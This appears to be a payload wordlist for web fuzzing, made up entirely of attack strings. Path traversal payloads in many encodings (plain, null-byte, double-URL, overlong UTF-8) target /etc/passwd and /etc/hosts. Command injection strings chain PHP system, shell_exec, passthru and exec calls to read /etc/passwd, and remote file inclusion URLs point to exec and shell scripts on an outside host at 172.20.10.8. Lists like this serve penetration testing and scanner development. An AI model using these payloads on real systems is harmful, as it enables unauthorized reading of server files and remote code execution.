test
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../..etc/passwd
../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../..etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
/etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../../etc/hosts
../../../../etc/hosts
../../../../../etc/hosts
../../../../../../etc/hosts
../../../../../../../etc/hosts
../../../../../../../../etc/hosts
../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hosts
../../../../../../../../../../..etc/hosts
../../../../../../../../../../../../etc/hosts
/etc/hosts%00
../etc/hosts%00
../../etc/hosts%00
../../../etc/hosts%00
../../../../etc/hosts%00
../../../../etc/hosts%00
../../../../../etc/hosts%00
../../../../../../etc/hosts%00
../../../../../../../../etc/hosts%00
../../../../../../../../../etc/hosts%00
../../../../../../../../../../etc/hosts%00
../../../../../../../../../../..etc/hosts%00
../../../../../../../../../../../../etc/hosts%00
%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd%00
%252e%252e%252fetc%252fhosts
%252e%252e%252fetc%252fhosts%00
%252e%252e%252f%252e%252e%252fetc%252fhosts
%252e%252e%252f%252e%252e%252fetc%252fhosts%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts
%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts%00
;system('cat /etc/passwd');
|system('cat /etc/passwd');
||system('cat /etc/passwd');
&system('cat /etc/passwd');
&&system('cat /etc/passwd');
;_exec('cat /etc/passwd');
|_exec('cat /etc/passwd');
||_exec('cat /etc/passwd');
&_exec('cat /etc/passwd');
&&exec('cat /etc/passwd');
;shell_exec('cat /etc/passwd');
|shell_exec('cat /etc/passwd');
||shell_exec('cat /etc/passwd');
&shell_exec('cat /etc/passwd');
&&shell_exec('cat /etc/passwd');
;passthru('cat /etc/passwd');
|passthru('cat /etc/passwd');
||passthru('cat /etc/passwd');
&passthru('cat /etc/passwd');
&&passthru('cat /etc/passwd');
test;system('cat /etc/passwd');
test|system('cat /etc/passwd');
test||system('cat /etc/passwd');
test&system('cat /etc/passwd');
test&&system('cat /etc/passwd');
test;_exec('cat /etc/passwd');
test|_exec('cat /etc/passwd');
test||_exec('cat /etc/passwd');
test&_exec('cat /etc/passwd');
test&&exec('cat /etc/passwd');
test;shell_exec('cat /etc/passwd');
test|shell_exec('cat /etc/passwd');
test||shell_exec('cat /etc/passwd');
test&shell_exec('cat /etc/passwd');
test&&shell_exec('cat /etc/passwd');
test;passthru('cat /etc/passwd');
test|passthru('cat /etc/passwd');
test||passthru('cat /etc/passwd');
test&passthru('cat /etc/passwd');
test&&passthru('cat /etc/passwd');
http://172.20.10.8/exec.php
http://172.20.10.8/exec.php%00
http://172.20.10.8/exec.txt
http://172.20.10.8/exec.txt%00
http://172.20.10.8/execBlind.php
http://172.20.10.8/execBlind.php%00
http://172.20.10.8/execBlind.txt
http://172.20.10.8/execBlind.txt%00
http://172.20.10.8/passthru.php
http://172.20.10.8/passthru.php%00
http://172.20.10.8/passthru.txt
http://172.20.10.8/passthru.txt%00
http://172.20.10.8/passthruBlind.php
http://172.20.10.8/passthruBlind.php%00
http://172.20.10.8/passthruBlind.txt
http://172.20.10.8/passthruBlind.txt%00
http://172.20.10.8/shell_exec.php
http://172.20.10.8/shell_exec.php%00
http://172.20.10.8/shell_exec.txt
http://172.20.10.8/shell_exec.txt%00
http://172.20.10.8/shell_execBlind.php
http://172.20.10.8/shell_execBlind.php%00
http://172.20.10.8/shell_execBlind.txt
http://172.20.10.8/shell_execBlind.txt%00
http://172.20.10.8/system.php
http://172.20.10.8/system.php%00
http://172.20.10.8/system.txt
http://172.20.10.8/system.txt%00
http://172.20.10.8/system_Blind.php
http://172.20.10.8/system_Blind.php%00
http://172.20.10.8/system_Blind.txt
http://172.20.10.8/system_Blind.txt%00
;http://172.20.10.8/exec.php
;http://172.20.10.8/exec.php%00
;http://172.20.10.8/exec.txt
;http://172.20.10.8/exec.txt%00
;http://172.20.10.8/execBlind.php
;http://172.20.10.8/execBlind.php%00
;http://172.20.10.8/execBlind.txt
;http://172.20.10.8/execBlind.txt%00
;http://172.20.10.8/passthru.php
;http://172.20.10.8/passthru.php%00
;http://172.20.10.8/passthru.txt
;http://172.20.10.8/passthru.txt%00
;http://172.20.10.8/passthruBlind.php
;http://172.20.10.8/passthruBlind.php%00
;http://172.20.10.8/passthruBlind.txt
;http://172.20.10.8/passthruBlind.txt%00
;http://172.20.10.8/shell_exec.php
;http://172.20.10.8/shell_exec.php%00
;http://172.20.10.8/shell_exec.txt
;http://172.20.10.8/shell_exec.txt%00
;http://172.20.10.8/shell_execBlind.php
;http://172.20.10.8/shell_execBlind.php%00
;http://172.20.10.8/shell_execBlind.txt
;http://172.20.10.8/shell_execBlind.txt%00
;http://172.20.10.8/system.php
;http://172.20.10.8/system.php%00
;http://172.20.10.8/system.txt
;http://172.20.10.8/system.txt%00
;http://172.20.10.8/system_Blind.php
;http://172.20.10.8/system_Blind.php%00
;http://172.20.10.8/system_Blind.txt
;http://172.20.10.8/system_Blind.txt%00

..//etc/passwd
../..//etc/passwd
../../..//etc/passwd
../../../..//etc/passwd
../../../../..//etc/passwd
../../../../../..//etc/passwd
../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd
..%2f/etc/passwd
..%2f..%2f/etc/passwd
..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%2e%2e//etc/passwd
%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
..%252f/etc/passwd
..%252f..%252f/etc/passwd
..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
%252e%252e//etc/passwd
%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
..\/etc/passwd
..\..\/etc/passwd
..\..\..\/etc/passwd
..\..\..\..\/etc/passwd
..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\..\/etc/passwd
..%255c/etc/passwd
..%255c..%255c/etc/passwd
..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
%252e%252e\/etc/passwd
%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd
..%5c..%5c/etc/passwd
..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
%2e%2e\/etc/passwd
%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
..%c0%af/etc/passwd
..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
..%c1%9c/etc/passwd
..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
..%%32%66/etc/passwd
..%%32%66..%%32%66/etc/passwd
..%%32%66..%%32%66..%%32%66/etc/passwd
..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd
